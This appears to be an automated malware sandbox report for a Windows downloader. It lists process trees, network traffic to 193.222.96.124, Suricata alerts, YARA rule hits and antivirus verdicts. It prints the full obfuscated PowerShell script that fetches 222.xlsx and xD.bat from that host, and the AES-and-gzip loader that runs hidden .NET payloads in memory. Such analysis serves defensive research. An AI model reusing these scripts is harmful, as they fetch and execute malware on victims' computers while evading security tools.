Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 9, 2024, 11 a.m. | May 9, 2024, 11:03 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF 
@(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx;
2176-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde
2332 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
2800 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2864
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.103:49164 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.103:49164 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\15.0\Registration\{91150000-0011-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\222.xlsx |
file | C:\Users\test22\AppData\Roaming\~$222.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\222.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\222.xlsx.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\222.xlsx.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Roaming.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\222.xlsx.LNK |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR 
$xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx; |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF 
@(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 9715 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! âû Ñ xl/workbook.xml¬UÛn£0}_iÿù¹% T©»ªz}´rÀ V ³¶iRUý÷^òÒm/9>3s<m«Òx B2^ÇØÈ uÆsV¯bt{sn!©sRòÆèJt6úþítÃÅzÁùÚ ZƨPª,Kf<á Á²ä¢" ¦beÉFPËRUcÛUV£B$>ÁKÑ ÏÚÖj"hIÐkdVe«X·ñª+zì@QeÑlUsA%¸½Å¾±pð`§ß LG[U,\ò¥:hkGúÈl[¿ Áö8Cò,AÎá>É*8`/`Øþ2iuZ |
Data received | Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data received | 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 |
Data sent | GET /222.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\222.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Mozilla Thunderbird\Capabilities\Hidden |
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\222.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=80) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |